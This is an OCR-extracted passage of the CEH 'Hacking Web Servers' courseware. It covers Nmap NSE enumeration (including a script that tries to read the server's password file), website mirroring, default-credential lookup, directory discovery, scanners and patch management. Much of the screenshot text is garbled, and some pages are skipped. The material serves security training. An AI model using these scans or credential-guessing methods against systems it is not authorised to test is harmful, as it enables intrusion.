|Content Encoding: gzip

jhost-header: c2hhomVkLmJsdWVob3NOLmNvbQ==

|x-Server-Cache: false |Query complete.

The server identilied itsell as :

@ froma 1810)

|

y

Goto ID Serve web page

Exit

Figure 13.26: Screenshot of ID Serve The following are some additional footprinting tools:

=

Netcraft (https://www.netcraft.com)

=

Uniscan (https://sourceforge.net)

=

Nmap (https://nmap.org)

=

Ghost Eye (https://github.com)

=

Skipfish (https://code.google.com)

Module 13 Page 1814

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Enumerating Web Server Information Using Nmap 1]

To enumerate

information

about the target website,

attackers can use advanced Nmap commandsand Nmap Scripting Engine (NSE) scripts. Examples are as follows:

feo]

nmap -sV --script http-enum target IP address

Ss

nmap target IP address -p 80 --script = http-frontpage-login

fen

nmap -sV -O -p target IP address

nmap --script http-passwd --script-args http-passwd.root =/ target IP address

‘s/n.org Copyright © by

Al

ved.

ty Prohibited.

Enumerating Web Server Information Using Nmap Source: https://nmap.org Nmap, along with the Nmap Scripting Engine (NSE), can extract a large amount of valuable information from the target web server. In addition to Nmap commands, NSE provides scripts that reveal various types of useful information about the target server to an attacker. An attacker uses the following Nmap commands and NSE scripts to extract information. =

Discover virtual domains with hostmap: $nmap

=

http-trace

-p80

localhost

--script

http-google-email

-p80

--script

http-userdir

-enum

localhost

Detect HTTP TRACE: $nmap

=

--script

Enumerate users with http-userdir-enum: nmap

=

Harvest email accounts with http-google-email: $nmap

=

hostmap

Detect a vulnerable server that uses the TRACE method: nmap

=

--script

-p80

--script

http-trace

Check if the web server is protected by a web application firewall (WAF) or IPS: $nmap

-p80

--script

http-waf-detect

--script-args="http-waf-

detect.uri=/testphp.vulnweb.com/artists.php,http-wafdetect.detectBodyChanges”

Module 13 Page 1815

www.modsecurity.org

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers =

Exam 312-50 Certified Ethical Hacker

Enumerate common web applications $nmap

=

--script

http-enum

-p80

Obtain robots.txt $nmap

-p80

--script

http-robots.txt

The following are some additional Nmap commands used to extract web server information: =

nmap

-sV

-O

-p

target

=

nmap

-sV

--script

=

nmap

target

"=

nmap --script http-passwd target IP address

IP

IP

address

http-enum

address

-p

target 80

IP

address

--script

=

--script-args

do] p ord for attacker @parrot #nmap -sV --script=http-enum www.goodshopping. com nmap.org ) goodshopping.«

s up (0.053 d for 10.10.1.19; shown: 990 closed tc 80/tcp

STATE open

SERVICE http

|_http-server-header:

| http-enum

|.

/login.aspx:

[135/tcp

/139/tcp

l445/tcp

'1801/tcp

open

5357/tcp

msrpc

open

msmq?

'3389/tcp open open

Microsoft

Info:

=/

EDT

com IIS

httpd

10.0

microsoft-ds?

Microsoft Windows RPC

Microsoft

Windows

netbios-ssn

msrpc msrpc msrpc

Microsoft Windows RPC Microsoft Windows RPC Microsoft Windows RPC

http

Microsoft

ms-wbt-server Microsoft

Terminal Services

HTTPAPI

|_http-server-header: Microsoft-HTTPAPI/2.0 IAC Address: 02:15:5D:02:45:2F (Unknown)

[Service

http-passwd.root

Possible admin folder

netbios-ssn

[2103/tcp open 12105/tcp open 2107/tcp open

VERSION

Microsoft-IIS/10.0

open

open

22-04-19 60:32 10.10.1.19)

www.movie (reset)

http-frontpage-login

0S:

Windows;

CPE:

httpd

2.0

(SSDP/UPnP)

cpe:/o:microsoft:windows

Service detection performed. Please Nmap done: 1 IP address (1 host up)

report any scanned in

incorrect results 61.63 conds

at

https://nmap.org/submit

Figure 13.27: Screenshot of Nmap.

Module 13 Page 1816

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Website Mirroring

cE H @i2as:

©

WebcopiPr Masi

Mirrora website to create a complete

profile of the site’s directory

structure, file structures, external links, etc.

©

Search for comments and other items

@

Use tools such as WebCopier Pro,

in the HTML source code to make footprinting activities more efficient

HTTrack Web Site Copier, Website Ripper Copier, etc. to mirror a website

‘ee TS]

senses [TEDTOT A Tse [NBME | + ‘hips //unvw maumumsofecom

Website Mirroring Website mirroring copies an entire website and its content onto a local drive. The mirrored website reveals the complete profile of the site’s directory structure, file structure, external links, images, web pages, and so on. With a mirrored target website, an attacker can easily map the website’s directories and gain valuable information. An attacker who copies the website does not need to be online to go through the target website. Furthermore, the attacker can gain valuable information by searching the comments and other items in the HTML source code of downloaded web pages. Many website mirroring tools can be used to copy a target website onto a local drive; examples include WebCopier Pro, HTTrack Web Site Copier, Website Ripper Copier, and Cyotek WebCopy.

Module 13 Page 1817

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Hacking Web Servers

WebCopier Pro

Source: https://www.maximumsoft.com WebCopier Pro is an offline browser to download websites and store them locally, so that they can be viewed/analyzed later. It allows attackers to analyze the website structure and find dead links. )

2 ees):

com

+

Home fi

es

| ¥

Download

WebCopier Pro - MaximumSoft website Advanced ™ Stop

Airing

WW Pause

Browse Stat — Project Project DX Settings || Downloads [ia Preview || Files» Project Download ax

Mo Properties Browse

O

[Schedule

L&E © convert Links

Qq

*x

Theme » ig) i) Q support

itp of the day

Hel Ip Copyto || Program iPhone / iPad || Options “P Show Report || Topics W Check Version

MiBEt72%

5-5) MaximumSoft website

@® MaximumSoft (defauit-htm) Download Status | Downloading...

File Name

© marimumsoft.com/suppatt/index him

© masimumsoft. com/buy/index htm © maximumsoft.com/css/uikit. oss (S..Zimg/buttons/appstore_amazon.png

LSS /ima/buttons/sppstore_google.png

unknown

unknown 144.2KB unknown

14.4 KB

Found 542

150.7 KB/sec

Processed | 409

705.3 KB/sec

Filtered BJ

SProjects

[}contents| EGtogrite

|

From cache

Enors

17.6 MB

[0

30.8 MB

Browser | WY Download info

Figure 13.28: Screenshot of WebCopier Pro.

The following are some additional website mirroring tools:

HTTrack Web Site Copier (https://www.httrack.com) Website Ripper Copier (https://www.tensons.com) Cyotek WebCopy (https://www.cyotek.com) Portable Offline Browser (http://www.metaproducts.com) Offline Explorer Enterprise (https://metaproducts.com)

Module 13 Page 1818

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Finding Default Credentials of Web Server

CEH

@ Many web server administrative interfaces are publicly accessible and are in the web root directory @ Often these administrative interface credentials are not properly configured and remain set to default

Default Passwords

interface and use the following techniquesto identify the default login credentials:

© Consult the administrative interface documentation and identify the default passwords @ Use Metasploit’s built-in database to scan the server

© Use online resources like Open Sez Me (https://opensez.me), cirt.net (https://cirt.net/passwords), etc © Attempt password guessing and brute-forcing attacks

ever NETSPHRKER CLOUD SHS AEF = tps//orenev/passwords

Finding Default Credentials of Web Server Administrators or security personnel use administrative interfaces to securely configure, manage, and monitor web application servers. Many web server administrative interfaces are publicly accessible and located in the root directory. Often, these administrative interface credentials are not properly configured and remain set to default. Attackers attempt to identify the running application interface of the target web server by performing port scanning. Once the running administrative interface is identified, the attacker uses the following techniques to identify the default login credentials: =

Consult the administrative interface documentation and identify the default passwords

=

Use Metasploit’s built-in database to scan the server

=

Use online resources such as Open Sez Me (https://open-sez.me) and cirt.net (https://cirt.net/passwords) to identify the default passwords

=

Attempt password-guessing and brute-forcing attacks

These default credentials can grant access to the administrative interface, compromising the web server and allowing the attacker to exploit the main web application.

Module 13 Page 1819

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers =

Exam 312-50 Certified Ethical Hacker

cirt.net Source: https://cirt.net/passwords cirt.net is a lookup database for default passwords, credentials, and ports.

Defautt

Scan your

Weasithiane

Ocfault Passwords

and vulnerabilities ‘@passdbon Twitter! Firefox Search Join Nikto-Announce List Email Address *

wi

0 Syst

First Name *

TOO MANY WEBSITES TO SCAN FOR VULNERABILITIES?

cate! (iiiiesiae

Alot

po

Apple

Technolo«

os

IS JUST MADE FOR YOU!

(ri)

scusomerices

(AREETRIAL')

Como

Figure 13.29: Screenshot displaying the default password DB page of cirt.net

The following are some additional websites for finding the default passwords of web server administrative interfaces:

=

https://open-sez.me

=

https://www.fortypoundhead.com

=

http://www.defaultpassword.us

=

https://default-password.info

=

https://www.routerpasswords.com

Module 13 Page 1820

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Finding Default Content of Web Server

CEH

|@ Most web application servers contain default content and functionalities, which allows attackers to leverage attacks @

Check forthe following default contents and functionalities in the web servers

© Administrator debug and test functionality © Sample functionality to demonstrate common tasks

© Publicly accessible powerful functions © Server installation manuals @

Use tools like Nikto2 (https://cirt.net) to identify the default content

Copyright © by

Ties Jere net Rights Reserved. Reproduction f Sty Prohibited.

Finding Default Content of Web Server Most servers of web applications have default contents and functionalities that allow attackers to launch attacks. The following are some common default contents and functionalities that an attacker attempts to identify in web servers. =

Administrators debug and test functionality Functionalities applications and state of both the main targets for

=

designed for administrators to debug, diagnose, and test web web servers contain useful configuration information and the runtime server and its running applications. Hence, these functionalities are the attackers.

Sample functionality to demonstrate common tasks Many servers contain various sample scripts and pages designed to demonstrate certain application server functions and application programming interfaces (APIs). Often, web servers fail to secure these scripts from attackers, and these sample scripts either contain vulnerabilities that can be exploited by attackers or implement functionalities that allow attackers to exploit.

=

Publicly accessible powerful functions Some web servers include powerful functionalities that are intended for administrative personnel and restricted from public use. However, attackers attempt to exploit such powerful functions to compromise the server and gain access. For example, some application servers allow web archives to be deployed over the same HTTP port as that used by the application. An attacker may use common exploitation frameworks such as Metasploit to perform scanning to identify default passwords, upload backdoors, and gain command-shell access to the target server.

Module 13 Page 1821

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Hacking Web Servers

=

Server installation manuals An attacker attempts to identify server manuals, which may contain useful information about configuration and server installation. Accessing this information allows the attacker to prepare an appropriate framework to exploit the installed web server.

Tools such as Nikto2 can be used to identify default contents. =

Nikto2 Source: https://cirt.net Nikto is a vulnerability scanner used extensively to identify potential vulnerabilities in web applications and web servers.

Figure 13.30: Screenshot of Nikto2

Module 13 Page 1822

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

CEH

Finding Directory Listings of Web Server @ When a web server receives a request for the directory, it responds to the request in the following ways:

@ Attackers use tools such as Dirhuntto search and analyze directories

@ Retums default resource within the directory @ Returns error

© Returns listing of directory content ‘@

Directory listings sometimes possess the following

vulnerabilities that allow the attackers to compromise the web server:

@

Improper access controls

© Unintentional access to the web root of servers @ After discovering the directory on the web server, makea request for the same directory and try to access the directory listings ©@

Try to exploit vulnerable web server software that gives

access to the directory listings

‘hips //othub com AlRights Reserved. Reproduction f Sty Prohibited

Copyright © by

Finding Directory Listings of Web Server When a web server receives a request for a directory, responds to the request in the following ways.

rather than a

file, the web

server

=

Return Default Resource within the directory: The server may return a default resource within the directory, such as index.html.

=

Return Error: The server may return an error, indicating that the request is not permitted.

=

Return listing of directory content: The server may return a listing showing the contents of the directory. A sample directory listing is shown in the screenshot.

such

as the

HTTP

status

code

403,

x

index.

© B to101.13

Index of /sk=m=m

Gprsckaze jzon © screenshot

Figure 13.31: Screenshot displaying a sample directory listing

Module 13 Page 1823

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Though directory listings do not have significant relevance from a security perspective, they occasionally possess the following vulnerabilities that allow attackers to compromise web applications:

=

Improper access controls

=

Unintentional access to the web root of servers

In general, after discovering a directory on a web server, an attacker makes a request for that directory and attempts to access the directory listing. Attackers also attempt to exploit vulnerable web server software that grants access to directory listings. Attackers use tools such as Dirhunt and Sitechecker to find directory listings of the target web

server. =

Dirhunt

Source: https://github.com Dirhunt is a web crawler optimized for searching and analyzing directories. This tool can find interesting results if the server has the "index of" mode enabled. Dirhunt is also useful if the directory listing is not enabled. It detects directories with false 404 errors, directories where an empty index file has been created to hide things, and so on.

ee File Edit

Search

J-lattacker@parrot $dirhunt

htt

to

ne

Started

raceback

Divhunt

now

(most

Terminal

Help

Parrot Terminal

/certifiedhacker.com/

recent

call

last):

File "/usr/local/Lib/python3.9/dist-packages/dirhunt/exceptions.py", lin wrapped return

func(*args,

line 47,

**kwargs)

File "/usr/local/lib/python3.9/dist-packages/dirhunt/crawler_url.py", in start processor.process(text,

soup)

File “/usr/local/lib/python3.9/dist-packages/dirhunt/processors.py", in process text = text.decode(‘'utf-8')

codec can't decode byte ‘utf-8' lUnicodeDecodeError: (HTML document) [200] http://certifiedhacker.com/ index.html http://certifiedhacker.com/sample-login.html

Index

file

found:

index.html

position

®xa9

in

(Not

Found)

line 79, line

261,

68416:

inva}

[200] http://certifiedhacker.com/corporate-learning-website/@1-homepage.html ML document) [200]

http://certifiedhacker.com/css/

(Generic)

[200]

htt

/certifiedhacker.com/Turbo

[200] [200]

htt htt

(Generic) /certifiedhacker.com/js/ /certifiedhacker.com/corporate-learning-website/about_us.html

[200]

http://certifiedhacker.com/Online

Max/index.htm

(HTML

Booking/index.htm

(H

document)

(HTML document)

document) [200] http://certifiedhacker.com/corporate-learning-website/services.html

(HTML

(HTML

Figure 13.32: Screenshot of Dirhunt displaying directories and files Module 13 Page 1824

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Vulnerability Scanning

CEH

@ Implement vulnerability scan to identify weaknesses in a network and determine if the system can be exploited

@ Sniff the network traffic to find any active systems, network services, applications, and vulnerabilities present

lo ©

|G Use vulnerability scanners such as Acunetix Web Vulnerability Scanner, and Fortify WebInspect to find hosts, services, and vulnerabilities

@ Test the web server infrastructure for any misconfigurations, outdated content, and

vulnerabilities using vulnerability scanners like Acunetix Web Vulnerability Scanner

‘ps:/faow.ccuneticcom

Vulnerability Scanning Vulnerability scanning is performed to identify vulnerabilities and misconfigurations in a target web server or network. Vulnerability scanning reveals possible weaknesses in a target server to exploit in a web server attack. In the vulnerability-scanning phase, attackers use sniffing techniques to obtain data on the network traffic to determine active systems, network services,

and applications. Automated tools such as Acunetix Web Vulnerability Scanner are used to perform vulnerability scanning on a target server and find hosts, services, and vulnerabilities. =

Acunetix Web Vulnerability Scanner Source: https://www.acunetix.com Acunetix Web Vulnerability Scanner (WVS) scans websites and detects vulnerabilities. Acunetix WVS checks web applications for SQL injections, XSS, and so on. It includes advanced pen testing tools to ease manual security audit processes and creates professional security audit and regulatory compliance reports based on AcuSensor Technology. It supports the testing of web forms and password-protected areas, pages with CAPTCHA, single sign-on, and two-factor authentication mechanisms. It detects application languages, web server types, and smartphone-optimized sites. Acunetix crawls and analyzes different types of websites, including HTML5, Simple Object Access Protocol (SOAP), and Asynchronous JavaScript and Extensible Markup Language (AJAX). It supports the scanning of network services running on the server and the port scanning of the web server.

Module 13 Page 1825

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Hacking Web Servers

To)

x

=

x

@ Acunetsx- scans

localhost

3

yee

ie)

acunetix

a -


High

Med

Low

ntp:rwww.mutest informalware-demos-named/MSO7-004N,

1

1

°

1 teto:rwe ww muvtestinto/malware-demos-namesS06-057/

1

°

o

PHich }

1

ntpsrwww.mwtest.informalware-demos-named/MS06-014-R

2

"

0

[HIGH

Etre ww. muvtestinfoimalware-demos-namedMS06-014-R.

2

1"

0

PHich }

1 teto:nwr ww movtest.into/malware-demos-namedniS06.013/

1

°

°

[rick J

©

1

°

°

©

mmutest =info

Log out

ntp:rwww.mutest informalware-demos-named/APSB10-02)

severity

Figure 13.48: Screenshot of QualysGuard Malware Detection

The following are some additional web server malware infection monitoring tools:

=

Sucuri SiteCheck (https://sucuri.net)

=

SiteLock Malware Removal (https://www.sitelock.com)

=

Quttera (https://quttera.com)

=

Web Inspector (https://www.webinspector.com)

=

SiteGuarding (https://www.siteguarding.com)

Module 13 Page 1866

Ethical Hacking and Countermeasures Copyright © by E6-Goul All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Web Server Security Tools

CE H

Fortify Webinspect is an automated dynamic testing solution Fortify WebInepect | that discovers configuration issues and identifies and prioritizes in running applications epInspect | security vulnerabilit ies

=p

Acunetix Web Vulnerability Scanner ‘tps: [fun acunetie.com

ems NetIQ Secure Configuration ® ~~ Manager “https://www. netiq.com

SAINT Security Suite ‘es: //u.carson-sot.com

Sophos Intercept X for Server

“https://www.sophos.com

UpGuard

“https://wwww. upguard.com

Web Server Security Tools =

Fortify Webinspect

Source: https://www.microfocus.com Fortify Webinspect is an automated dynamic testing solution that discovers configuration issues as well as identifies and prioritizes security vulnerabilities in running applications. It mimics real-world hacking techniques and provides a comprehensive dynamic analysis of complex web applications and services. WebInspect dashboards and reports provide organizations with visibility and an accurate risk posture of its applications.

Module 13 Page 1867

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

File Edit View Took Scan Enterprise Sewer Reports Help } New + BF Open > 8 Compliance Manager [Ei Policy Manager (E] Report @ Schedule 4G} Smantpdate

[epecteons | @ TrathcMontor

_ Smart Audited: 141 of 632 Most Info mu P2P info Bax Wilcertfeaes

Verified: 0 of 147 Reflection Audited: 0 of

B cookies

Figure 13.49: Screenshot of Fortify WebInspect

The following are some additional web server security tools:

=

Acunetix Web Vulnerability Scanner (https://www.acunetix.com)

=

NetIQ Secure Configuration Manager (https://www.netig.com)

=

SAINT Security Suite (https://www.carson-saint.com)

=

Sophos Intercept X for Server (https://www.sophos.com)

=

UpGuard (https://www.upguard.com)

Module 13 Page 1868

Ethical Hacking and Countermeasures Copyright © by E6-Goul All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Web Server Pen Testing Tools CORE Impact © CORE Impact finds vulnerabilities on an organization's web server © This tool allows a user to evaluate the security posture of a web server using the present-day cybercrime techniques Web Server Pen Testing Tools @

Immunity

fe .

CANVAS

(https://www.immunityinc.com)

=

© Arachni (https://www.arachniscanner.com) @ WebSurgery (https://sunrisetech.gr) © Mitmprox (https://mitmproxy.org) @ Webalizer (https://webalizer. net)

tas://www.coresecuty.com

Web Server Pen Testing Tools =

CORE Impact

Source: https://www.coresecurity.com CORE Impact finds vulnerabilities in an organization’s web server. This tool allows a user to evaluate the security posture of a web server by using the same techniques currently employed by cyber criminals. It scans for possible vulnerabilities in the web server, imports scan results, and runs exploits to test the identified vulnerabilities. It can also scan network servers, workstations, firewalls, routers, and various applications for vulnerabilities; identify which vulnerabilities pose real threats to the network; determine the potential impact of exploited vulnerabilities; and prioritize and execute

remediation efforts.

Module 13 Page 1869

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Hacking Web Servers

{Get AD data wth SharpHound (Bloedtound Colectr)

mea

Figure 13.50: Screenshot of CORE Impact

The following are some additional web server pen testing tools: =

Immunity CANVAS (https://www.immunityinc.com)

=

Arachni (https://www.arachni-scanner.com)

=

WebSurgery (https://sunrisetech.gr)

=

Mitmprox (https://mitmproxy.org)

=

Webalizer (https://webalizer.net)

Module 13 Page 1870

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

CEH LO#05: Summarize Patch Management Concepts

Copyright © by

Patch Management Developers always attempt to find bugs in a web server and fix them. Bug fixes are distributed in the form of patches, which provide protection against known vulnerabilities. Unpatched or vulnerable patches can create a security loophole in the web server. This section describes the role of patches, upgrades, and hotfixes in securing web servers. This section also provides guidance for choosing proper patches, upgrades, hotfixes, and their appropriate sources for

secure patch management.

Module 13 Page 1871

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Patches and Hotfixes 1]

(4)

CEH

Hotfixes are an update to fix a specific customer issue and not always distributed outside the customer

organization

A patchis a small piece of software designed to fix problems, security vulnerabilities, and bugs and improve the performance of a computer program or its supporting data

Users maybe notified through emails or through the vendor's website A patch can be considered as a repair job for a programming problem Hotfixesare sometimes packaged as a set of fixes called a combined hotfix or service pack

Patches and Hotfixes A patch is a small piece of software designed to fix problems, security vulnerabilities, and bugs as well as improve the usability or performance of a computer program or its supporting data. A patch can be considered a repair job for a programming problem. A software vulnerability is the weakness of a software program that makes it susceptible to malware attacks. Software vendors provide patches that prevent exploitations and reduce the probability of threats exploiting a specific vulnerability. Patches include fixes and updates for multiple known bugs or issues. A patch is a publicly released update that is available for all customers. A system without patches is much more vulnerable to attacks than a regularly patched system. If an attacker can identify a vulnerability before it is fixed, then the system might be susceptible to malware attacks. A hotfix is a package used to address a critical defect in a live environment and contains a fix for a single issue. It updates a specific product version. Hotfixes provide quick solutions and ensure that the issues are resolved. Apply hotfixes to software patches on production systems.

Vendors update users about the latest hotfixes through email or make them available on their official website. Hotfixes are updates that fix a specific customer issue and are not always distributed outside the customer organization. Vendors occasionally deliver hotfixes as a set of fixes called a combined hotfix or service pack.

Module 13 Page 1872

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

What is Patch Management? ‘@

cE H

“Patch management is a process used to fix known vulnerabilities by ensuring that the appropriate patches are installed on a system”

An automated patch management process Detect

| © Use tools to detect missing security patches

Assess

| @ Asses the issue(s) and associated severities by mitigating the factors that may influence the decision

Acquire

| @ Download the patch for testing

Test

| @ Install the patch first on a testing machine to verify the consequences of the update

Deploy

| @ Deploy the patch to the computers and ensure that the applications are not affected

Maintain

| @ Subscribeto get notifications about vulnerabilities as they get detected

What is Patch Management? According to https://www.techtarget.com/searchenterprisedesktop/, patch management is an area of systems management that involves acquiring, testing, and installing multiple patches (code changes) in an administered computer system. Patch management is a method of defense against vulnerabilities that cause security weaknesses or corrupt data. It is a process of scanning for network vulnerabilities, detecting missed security patches and hotfixes, and then deploying the relevant patches as soon as they are available to secure the network. It involves the following tasks: =

Choosing, verifying, testing, and applying patches

=

Updating previously applied patches with current patches

=

Listing patches applied previously to the current software

=

Recording repositories or depots of patches for easy selection

=

Assigning and deploying the applied patches

An automated patch management process includes the following steps.

=

Detect: Use tools to detect missing security patches.

=

Assess: Asses the issue(s) and its associated severity by mitigating the factors that may influence the decision.

=

Acquire: Download the patch for testing.

=

Test: Install the patch first on a test machine to verify the consequences of the update.

=

Deploy: Deploy the patch to computers and ensure that applications are not affected.

=

Maintain:

Subscribe

to

receive

notifications

about

vulnerabilities

when

they

are

reported. Module 13 Page 1873

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Installation of a Patch Identifying Appropriate Sources for Updates and Patches

@

First, make a patch management plan that fits the operational environment and business objectives

@ Find appropriate updates and patcheson the homesites of the applications or operating systems’ vendors

|@ The recommended way of tracking issues relevant to proactive patching is to register with the home sites to receive alerts

Implementation and Verification of a Security Patch or Upgrade

Installation of a Patch

Users can access and install security patches via the World Wide Web

@ Before installing any patch, verify

Patches can be installed in two ways

@ Use a proper patch management program to validate file versions and checksums before deploying security patches

Manual Installation

@ In this method, the user downloads the patch from the vendor and installs it

Automatic Installation

© Inthis method, the applications use the Auto Update feature to

update themselves

the source

|@ The patch management tool must be able to monitor the patched systems @ The patch management team should check for updates and

patches regularly

Installation of a Patch The installation of a patch entails the following tasks. Identifying Appropriate Sources for Updates and Patches It is important to identify appropriate sources for updates that are not installed from trusted sources more vulnerable to attacks, instead of hardening appropriate sources for updates and patches plays a The following are some patches.

updates and patches. Patches and can render the target server even its security. Thus, the selection of vital role in securing web servers.

methods for identifying appropriate sources for updates and

o

Create a patch management plan that fits the operational environment and business objectives.

o

Find appropriate updates and patches on the home sites of the applications or OS vendors.

o

The recommended method of tracking issues relevant to proactive register to the home sites to receive alerts.

patching

is to

Installation of a Patch Users can access and install security patches via the World Wide Web. Patches can be installed in two ways. o

Manual Installation

In this method, the user downloads the patch from the vendor and installs it.

Module 13 Page 1874

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers °

Exam 312-50 Certified Ethical Hacker

Automatic Installation In this method, applications use an auto update feature to update themselves.

=

Implementation and Verification of a Security Patch or Upgrade °

Before installing any patch, verify the source.

°

Use a proper patch management program to validate file versions and checksums before deploying security patches. The patch management tool must be able to monitor the patched systems. The patch management team should check for updates and patches regularly.

Module 13 Page 1875

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Patch Management Tools

ntos://wwwf.com

BB

Suite ‘tps: broadcom. com

OC

Solarwinds Patch Manager ‘ts: / fun solaris.com

s

GFI LanGuard's patch management automatically scans your network and installs and manages security and non-security patches

Symantec Client Management

Kaseya Patch Management nips: //o kaseya.com

fF

GFI LanGuard

CE H

Software Vulnerability Manager ‘nep:/ fw fexera.com Ivanti Patch for Endpoint Manager ‘maps: antcom

Patch Management Tools

=

GFI LanGuard Source: https://www.gfi.com The GFI LanGuard patch management software scans the user’s network automatically as well as installs and manages security and non-security patches. It supports machines across Microsoft®, MAC OS X®, and Linux® operating systems, as well as many thirdparty applications. It allows auto-downloads of missing patches as well as patch rollback, resulting in a consistently configured environment that is protected from threats and vulnerabilities.

Module 13 Page 1876

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

SDESCRBBCECEOR

Hacking Web Servers

Figure 13.51: Screenshot of GFI LanGuard patch management software

The following are some additional patch management tools:

=

Symantec Client Management Suite (https://www.broadcom.com)

=

Solarwinds Patch Manager (https://www.solarwinds.com)

=

Kaseya Patch Management (https://www.kaseya.com)

=

Software Vulnerability Manager (https://www.flexera.com)

=

Ivanti Patch for Endpoint Manager (https://www.ivanti.com)

Module 13 Page 1877

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Module Summary o

Q

,

CEH

Inthis module, we have discussed the following: > Web server concepts > Various web server threats and attacks in detail > Web server attack methodology in detail, including information gathering, web server footprinting, website mirroring, vulnerability scanning, session hijacking, and web

server passwords hacking

> Various web server hacking tools > Various countermeasures that are to be employed to prevent web server hacking attempts by threat actors

> Detailed discussion on securing web servers using various security tools > Patch management concepts

Q Inthe next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, hack web applications Copyright © by

ved. Reproduction is Sticty Prohisted

Module Summary In this module, we discussed in detail the general concepts related to web servers; various web server threats and attacks; the web server attack methodology, including information gathering, web server footprinting, website mirroring, vulnerability scanning, session hijacking, and web server passwords hacking; and various web server hacking tools. Additionally, we discussed various countermeasures that can be employed to prevent web server hacking attempts by threat actors. We also discussed how to secure web servers using various security tools. We concluded the module with a detailed discussion on patch management concepts. In the next module, we will discuss in detail how attackers, including ethical hackers and pen testers, hack web applications.

Module 13 Page 1878

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

-

Certified | Ethical

EC-Council

Hacker

———

MODULE

14

HACKING WEB ———APPLICATIONS

EC-COUNCIL OFFICIAL CURRICULA

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

CEH

LO#01: Summarize Web Application Concepts

©

LO#02: Demonstrate Web Application Threats

o

®

OBJECTIVES

LO#04: Explain Web API, Webhooks, and Web Shell

o

LEARNING

LO#05: Summarize the Techniques used in Web

© LO#03: Explain Web Application Hacking Methodology

Application Security

Copyright © by

